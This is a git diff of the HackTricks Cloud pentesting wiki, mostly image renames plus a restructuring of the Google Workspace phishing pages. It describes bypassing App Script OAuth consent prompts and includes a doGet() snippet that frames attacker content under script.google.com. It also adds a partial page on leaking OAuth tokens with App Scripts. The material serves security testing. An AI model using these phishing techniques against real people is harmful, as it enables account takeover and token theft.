diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 0000000000..d7961cab39
Binary files /dev/null and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index d7961cab39..ece9585b82 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index ece9585b82..3048b65efa 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 3048b65efa..fb52dbc6cd 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index fb52dbc6cd..ce50798209 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index ce50798209..fb5aa4f77c 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index fb5aa4f77c..0f269bd025 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 0f269bd025..66bce84492 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 66bce84492..cf55c03e28 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index cf55c03e28..7e59066fb8 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 7e59066fb8..a66b921a15 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index a66b921a15..6e6b14ecd4 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png
index 6e6b14ecd4..67281e0416 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png
index 67281e0416..0b02740595 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png
index 0b02740595..f6d47edde9 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1).png
index f6d47edde9..e521aaf21b 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png
index e521aaf21b..9484a40cb8 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png
index 9484a40cb8..08abbbefe3 100644
Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png
index 08abbbefe3..ffcaa54f40 100644
Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index ffcaa54f40..bf87460b34 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (145).png b/.gitbook/assets/image (145).png
new file mode 100644
index 0000000000..b3920360d3
Binary files /dev/null and b/.gitbook/assets/image (145).png differ
diff --git a/.gitbook/assets/image (146).png b/.gitbook/assets/image (146).png
new file mode 100644
index 0000000000..0c5f0ae7e0
Binary files /dev/null and b/.gitbook/assets/image (146).png differ
diff --git a/.gitbook/assets/image (147).png b/.gitbook/assets/image (147).png
new file mode 100644
index 0000000000..74939c8ad6
Binary files /dev/null and b/.gitbook/assets/image (147).png differ
diff --git a/.gitbook/assets/image (148).png b/.gitbook/assets/image (148).png
new file mode 100644
index 0000000000..09aa87e562
Binary files /dev/null and b/.gitbook/assets/image (148).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index bf87460b34..e363ea97e9 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index 5c668732e9..5f81bb1685 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -174,7 +174,8 @@
* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md)
* [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md)
* [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md)
- * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing.md)
+ * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md)
+ * [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md)
* [AWS Pentesting](pentesting-cloud/aws-security/README.md)
* [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md)
* [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md
index ba990bcb23..b444e72c34 100644
--- a/pentesting-ci-cd/okta-security/README.md
+++ b/pentesting-ci-cd/okta-security/README.md
@@ -64,11 +64,11 @@ getST.py -spn HTTP/clientname.kerberos.okta.com -dc-ip 1.2.3.4 LAB/comprommisedu
With a ticket retrieved for the AD user, we need to inject this on a host we control using Rubeus or Mimikatz:
-
+
You’ll need to make sure that `clientname.kerberos.okta.com` is added to the “Intranet” security zone in Internet Options. And then, in our browser, if we hit the below URL, we should find that we receive a JSON response providing an `OK` result when the Kerberos ticket is accepted:
-
+
Heading over to the Okta dashboard, if everything is OK, you’ll be signed in.
diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md
index 6140d853dc..af57464ee8 100644
--- a/pentesting-ci-cd/travisci-security/README.md
+++ b/pentesting-ci-cd/travisci-security/README.md
@@ -44,7 +44,7 @@ It looks like It's not possible to set crons inside the `.travis.yml` according
TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
- (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+ (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### Dumping Secrets
diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md
index a257d4054c..08a6f1ef5f 100644
--- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md
+++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md
@@ -106,7 +106,7 @@ aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**.
{% endhint %}
-
+
### Generic KMS Ransomware
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 0108c77f85..ef0890c8ad 100644
--- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -62,7 +62,7 @@ Note that ECR requires that users have **permission** to make calls to the **`ec
It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
-
+
First, you need to give the external account access over the registry with a **registry policy** like:
diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
index e7d8584432..e86caaca7f 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
@@ -277,7 +277,7 @@ It's possible to generate API keys in the API Gateway portal and even set how mu
To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key:
-
+
## Unauthenticated Access
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
index 15ce95982a..0a9119ce95 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -46,7 +46,7 @@ The “upgrade” from normal refresh token to primary refresh token is not poss
If there is a policy that requires MFA to sign in, we can instead use the `interactiveauth` module:
-
+
The resulting refresh token (which is cached in the `.roadtools_auth` file) can be used to request a token for the device registration service, where we can create the device:
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md
index e3504670cb..ff6cfe85dc 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md
@@ -113,7 +113,7 @@ Tokens were written to .roadtools_auth
There’s also other options you can use to specify other resources or the correct redirect URL for the app you are using:
-
+
## Selenium based Azure AD authentication
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
index 57166e9c20..5f97c4f47a 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
@@ -43,7 +43,7 @@ The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync
It's possible to extract the configuration from one of the tables, being one encrypted:
-
+
The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD.
diff --git a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
index 43da045db2..8af7ea7e42 100644
--- a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
+++ b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
@@ -213,7 +213,7 @@ az network vnet subnet list --resource-group --vnet-name
+
**Service Endpoints:**
diff --git a/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md b/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md
index 27d4fd684d..8225bfc337 100644
--- a/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md
+++ b/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md
@@ -70,7 +70,7 @@ Once a connection is generated, you can use it to **link repositories that the G
This option is available through the button:
-
+
{% hint style="success" %}
Note that repositories connected with this method are **only available in Triggers using 2nd generation.**
diff --git a/pentesting-cloud/gcp-security/gcp-basic-information.md b/pentesting-cloud/gcp-security/gcp-basic-information.md
index 3dccadc85b..79c0f44e85 100644
--- a/pentesting-cloud/gcp-security/gcp-basic-information.md
+++ b/pentesting-cloud/gcp-security/gcp-basic-information.md
@@ -168,7 +168,7 @@ When an organisation is created several groups are **strongly suggested to be cr
* No expiration
* If people is accessing Workspace through a third party provider, these requirements aren't applied.
-
+
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
index 489751276f..edb0d910db 100644
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
@@ -60,7 +60,7 @@ Note that the **first time a GCP action is performed in Cloud Shell that require
This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session.
{% endhint %}
-
+
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
index 33ec51eb98..83469e2296 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
@@ -78,8 +78,8 @@ gcloud services api-keys undelete
Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin):
-{% content-ref url="../../workspace-security/gws-google-platforms-phishing.md" %}
-[gws-google-platforms-phishing.md](../../workspace-security/gws-google-platforms-phishing.md)
+{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](../../workspace-security/gws-google-platforms-phishing/)
{% endcontent-ref %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
index b8e01892d9..7c285a56e4 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
@@ -35,7 +35,7 @@ Key features of Google Cloud SQL include:
In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":**
-
+
It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default.
@@ -56,7 +56,7 @@ By default a Google-managed encryption key is used, but it's also **possible to
* **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database
* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it**
-
+
### Data Protection
diff --git a/pentesting-cloud/workspace-security/README.md b/pentesting-cloud/workspace-security/README.md
index b8181eef7a..6ad54435b1 100644
--- a/pentesting-cloud/workspace-security/README.md
+++ b/pentesting-cloud/workspace-security/README.md
@@ -14,55 +14,20 @@ Other ways to support HackTricks:
-## Google Platforms and OAuth Apps Phishing
+## Entry Points
+
+### Google Platforms and OAuth Apps Phishing
Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in:
-{% content-ref url="gws-google-platforms-phishing.md" %}
-[gws-google-platforms-phishing.md](gws-google-platforms-phishing.md)
+{% content-ref url="gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](gws-google-platforms-phishing/)
{% endcontent-ref %}
-## Password Spraying
+### Password Spraying
In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address.
-## App Scripts
-
-Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt)
-
-However, even if the app isn't verified there are a couple of ways to not show that prompt:
-
-* If the publisher of the app is in the same Workspace as the user accessing it
-* If the script is in a drive of the user
-
-### Copy Document Unverified Prompt Bypass
-
-When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
-If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.**
-
-{% hint style="warning" %}
-If someone creates a **copy** of that **document** that **contained the App Script**, he will also be **copying the App Script**, therefore when he **opens** the copied **spreadsheet**, the **regular OAuth prompt** will appear **bypassing the unverified prompt**, because **the user is now the author of the App Script of the copied file**.
-{% endhint %}
-
-This method will also be able to bypass the Workspace admin restriction:
-
-But can be prevented with:
-
-### Shared Document Unverified Prompt Bypass
-
-Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
-
-{% hint style="warning" %}
-This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
-
-This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
-{% endhint %}
-
-{% hint style="danger" %}
-This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
-To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags.
-{% endhint %}
-
## Post-Exploitation
If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges:
@@ -96,6 +61,7 @@ If you have compromised some credentials or the session of the user check these
* Remove email forwarders
* Remove emails filters
* Remove recovery email/phones
+* Removed malicious synced smartphones
* Remove bad Android Apps
* Remove bad account delegations
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
similarity index 81%
rename from pentesting-cloud/workspace-security/gws-google-platforms-phishing.md
rename to pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
index db6c5fc7e4..ea990d81e7 100644
--- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing.md
+++ b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
@@ -24,13 +24,13 @@ Apparently, by default, in workspace members [**can create groups**](https://gro
It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
-
+
## Google Chat Phishing
You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
-
+
{% hint style="success" %}
**In my testing however the invited members didn't even receive an invitation.**
@@ -43,7 +43,7 @@ You can check how this worked in the past in: [https://www.youtube.com/watch?v=K
In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
-
+
{% hint style="success" %}
Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
@@ -55,7 +55,7 @@ You can **create a calendar event** and add as many email address of the company
This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
-
+
To make it look less suspicious:
@@ -63,6 +63,36 @@ To make it look less suspicious:
* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
* Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
+## App Scripts Redirect Phishing
+
+It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**. \
+The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
+
+{% code overflow="wrap" %}
+```javascript
+function doGet() {
+ return HtmlService.createHtmlOutput('')
+ .setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL);
+}
+```
+{% endcode %}
+
+For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH\_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH\_ZscKQTJDC/exec) you will see:
+
+
+
+{% hint style="success" %}
+Note that a warning will appear as the content is loaded inside an iframe.
+{% endhint %}
+
+## App Scripts OAuth Phishing
+
+It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
+
+{% content-ref url="gws-app-scripts.md" %}
+[gws-app-scripts.md](gws-app-scripts.md)
+{% endcontent-ref %}
+
## OAuth Apps Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
@@ -126,20 +156,20 @@ python3 app.py --client-id "" --client-secret ""
Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
-
+
The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
-{% content-ref url="../gcp-security/gcp-persistence/gcp-non-svc-persistance.md" %}
-[gcp-non-svc-persistance.md](../gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
+{% content-ref url="../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md" %}
+[gcp-non-svc-persistance.md](../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
{% endcontent-ref %}
#### Using `glcoud`
It's possible to do something using gcloud instead of the web console, check:
-{% content-ref url="../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md" %}
-[gcp-clientauthconfig-privesc.md](../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
+{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md" %}
+[gcp-clientauthconfig-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
{% endcontent-ref %}
## References
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
new file mode 100644
index 0000000000..5666c3a8d7
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
@@ -0,0 +1,280 @@
+# GWS - App Scripts
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## App Scripts
+
+App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
+They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
+
+### Create App Script
+
+There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
+
+
+
+Create a container-bound project from Google Docs, Sheets, or Slides
+
+1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
+2. Click **Extensions** > **Google Apps Script**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project
+
+To create a standalone project from Apps Script:
+
+1. Go to [`script.google.com`](https://script.google.com/).
+2. Click add **New Project**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project from Google Drive
+
+1. Open [Google Drive](https://drive.google.com/).
+2. Click **New** > **More** > **Google Apps Script**.
+
+
+
+
+
+Create a container-bound project from Google Forms
+
+1. Open a form in Google Forms.
+2. Click More more\_vert > **Script editor**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project using the clasp command line tool
+
+`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
+
+See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
+
+
+
+## App Script Scenario
+
+### Create Google Sheet with App Script
+
+Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
+
+### Leak token
+
